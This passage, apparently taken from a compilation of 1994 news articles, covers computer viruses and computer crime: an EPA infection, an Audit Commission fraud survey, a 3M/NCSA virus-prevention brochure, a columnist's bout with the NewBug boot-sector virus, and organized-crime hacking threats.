process that could last a couple of days, Laws said. EPA officials aren't sure how the virus infected the computers, he added. "I don't think it was any sabotage," Laws said. "This was not something that we think was a deliberate occurrence." Copyright 1994 The Financial Times Limited; Financial Times October 13, 1994, Thursday HEADLINE: Computer fraud rises sharply Attacks on public-sector and private-sector computer systems by thieves, hackers and virus writers have increased dramatically in the past three years, the Audit Commission said yesterday. The rise is a consequence of the spread of personal computers and networks but also the result of managers neglecting or refusing to put into practice measures which could contain or reduce computer fraud and hacking. The commission says the total value of losses caused by computer abuse has risen 183 per cent since the last survey - the average loss per incident caused through fraud is now Pounds 28,170. The study - involving returns from more than 1,000 companies - shows that the number of incidents of computer abuse reported has increased from 12 per cent of organisations canvassed in 1991 to 36 per cent. There has also been a 38 per cent increase in reported fraud and an eightfold rise in the use of illicitly obtained software. Incidents reported to the commission range from an employee who gained access to her own and her husband's debt records and reduced them, to a nurse who hacked into a hospital's computer system and prescribed potentially lethal drugs for one patient and altered treatment records for others. The figures almost certainly understate the problem - organisations are notoriously shy of admitting incid-ents. Management, it says, does not impose adequate controls. It found almost 25 per cent of organisations had no internal auditing procedures, 60 per cent did not carry out security awareness training, 50 per cent had no computer audit skills and more than 80 per cent did not practise risk analysis. Copyright 1994 The National Underwriter Company National Underwriter, Life & Health/Financial Services Edition October 10, 1994 HEADLINE: Virus Control Guide Targets Hackers And Pros A guide to understanding and controlling computer viruses is now available under a joint program between the National Computer Security Association and 3M Co. "How to Avoid Computer Viruses" is a pocket-size, illustrated 20-page brochure written for computer users of all levels of experience. Complete with detailed questions and answers, tables and charts, the new brochure aims to separate myth from fact about this often misunderstood aspect of computing. Organized in a multi-panel, graphical format, the brochure uses simple language to explain what a computer virus is, how they spread, how to distinguish a virus from a computer's "virus-like" behavior, and how to prevent an infection as well as eradicate one after it strikes. The brochure offers tips and insights on coping with boot-sector and file-infecting viruses; understanding logic bombs, time bombs, Trojan horses and worms; what to look for and when to use anti-virus software; how virus behavior varies from PCs to Macs to local area networks; recommended backup techniques; and how to ensure new diskettes are virus free. Citing recent research by Dataquest Inc. of San Jose, Calif., and Carlisle, Pa.-based NCSA, the booklet notes, "Nobody knows the total price tag for crimes by virus authors, but it's estimated in the billions of dollars. A serious virus infection can put the user out of business from a few days up to a month." Karen Greco, market development manager in 3M's Data Storage Markets Division, St. Paul, Minn., said, "3M and NCSA are reaching out to business and home computer users with practical advice on how to deal with computer viruses. Awareness is the first step in building a good defense." "NCSA has long advocated that companies establish in-house computer virus policies that will educate employees and equip them with protective measures," said Bob Bales, NCSA executive director. "Certainly, not all viruses are equal," Mr. Bales said. "The pernicious 'Michelangelo virus, which wipes out hard disk information, is nothing like the relatively harmless tune-playing 'Yankee Doodle' virus. "The 3M/NCSA guide will enable users to understand the often perplexing ways viruses behave and detect them before it's too late." He said the brochure complements NCSA's new dedicated Virus Help line to provide technical support to users who think their computer may have been infected by a virus. The service costs $ 1.95 a minute. Call 900-555-6272 weekdays between 9 a.m.-5 p.m. Eastern time. The brochure is available by printing a name and address on a 3X5 card and mailing it with a $ 2 check or money order to 3M Virus Brochure, PO Box 8031, Young-America, Minn., 55551-8031. Two on-line services also carry the guide, without tables and charts. One is a dedicated Computer Security Forum on CompuServe, installed by NCSA. The go command is GONCSA. The other is for Delphi subscribers, who may access the document on the Computing Menu. Copyright 1994 Globe Newspaper Company The Boston Globe October 7, 1994, Friday, City Edition HEADLINE: You need to treat viruses immediately; My computer picked up a virus last week, and it just made me sick. It's not so much the damage done; in this case I suffered the loss of files on only a couple of disks. But getting rid of a computer virus is a nuisance that demands immediate attention, no matter how important or pressing the work you might be doing at the moment. It's drudgery and almost wholly unrewarding. I can't imagine what conceivable satisfaction a hacker gets from writing and spreading a bit of code that wrecks the workdays and playtime of thousands of people the saboteur doesn't even know. But it happens all the time, and if you use a computer, it could happen to you. This is a recommendation that you obtain a good virus scanner and shield program and update them regularly, at least once a year. The nefarious worms who concoct these artificial bugs are constantly trying to build stealthier invaders to elude the programs written to detect and disable them. My latest encounter was with something called NewBug, a virus that invades the boot sector of an ordinary floppy disk. It is not held in particularly high regard by people who study the sophistication of these products, but it is trouble nonetheless. I discovered it when trying to install a new program on my hard disk drive using the original disks sent from the program's developer. It was a Windows program, and every time I attempted to execute the "a:install" command, the little hourglass symbol on the screen would change color and the machine would freeze solid. I suspected a faulty disk or installation program. Having encountered viruses before, I always start up my computer with a sentinel program that is supposed to check for infections when the machine "boots up" and whenever the computer addresses a new disk, such as the floppy I was trying to use. But in this case, the machine locked up before signaling the source of the problem. When I called the software developer of the program I was trying to install, I was advised to check for viruses. The company had encountered these symptoms before. The person I spoke to was confident the disks were not infected when they were sent to me and suggested I may have inadvertently downloaded an infected file from the Internet. I was skeptical, but did as he suggested. I first checked all six of the suspect floppy disks with a program called Microsoft Anti-Virus for Windows, which had come installed on my computer when it was delivered less than a year ago. It detected nothing. I then ran an old version of McAfee Associates' Viruscan, which I happened to have on hand. It had helped identify a "Yankee Doodle" infection in 1990 and had proved useful on at least two subsequent occasions. This time it came up blank. Dialing up a commercial online service, I downloaded the latest McAfee product, and sure enough, it identified NewBugGenb on the suspect floppies. Cleaning those disks was no problem, and fortunately, my hard drive tested clean, indicating NewBug had not succeeded in jumping from the floppy disk into my computer's innards, where it can hide in the partition table of the hard drive and cause sporadic behavior problems. To prevent reinfection, however, it is necessary to scan every floppy disk around and, in my case, two other PCs I had used recently. One of the computers, a laptop I had received on loan and had not armed with the virus sentinel, contained a "Genp" virus, indicating the bug had successfully migrated from the boot sector of a floppy disk to the partition table of the laptop's internal hard disk. It is conceivable the machine was infected when I received it and was transferring the virus to floppies when I installed programs on it. I could not be sure. I found several more infected floppy disks in my collection and, when running a program to purge the virus, ruined the files on two of them. Perhaps if one kept a careful enough log, it would be possible to determine which floppy disk had been run on which machine on what date and thereby trace the bug to its earliest appearance. Without such meticulous written records, I quickly became confused about when I had loaded a specific program on a particular machine and could not pinpoint where I caught the bug. Perhaps the virus writer will now take some pleasure in having wasted hours of my time. It takes all kinds. Who sells antivirus software Major developers of antivirus software distribute their products through computer stores, online services and direct mail. They include: - McAfee Associates (408) 988-3832. - Symantec Corp., publisher of Norton Antivirus, (408) 253-9600. - Central Point Software, now a division of Symantec and publisher of Microsoft Anti-Virus, (503) 690-8088. These companies and other virus-fighting organizations also may be contacted online through the major commercial online services. Another source of information about computer viruses and what to do about them is the National Computer Security Association (717) 258-1816. Copyright 1994 The Times Journal Company Defense News October 3, 1994 / October 9, 1994 HEADLINE: Organized Crime Hackers Jeopardize Security of U.S. Technically savvy organized crime networks, most predominantly in Russia, now potentially pose a greater threat to U.S. national security than legitimate governments that harbor anti-American sentiments, say government and intelligence officials. While the Pentagon makes plans to fight and win two simultaneous regional conflicts, the real threat to American interests lies in the ability of criminals to infiltrate and destroy the U.S. financial and information systems, Scott Charney, chief of the Computer Crimes Unit, Department of Justice, said Sept. 26 at a conference here sponsored by the Center for Strategic and International Studies. Charney said the yearly cost of computer crimes in the United States is between $ 500 million and $ 5 billion, but no one knows for sure. The real problems are about to begin, as the hackers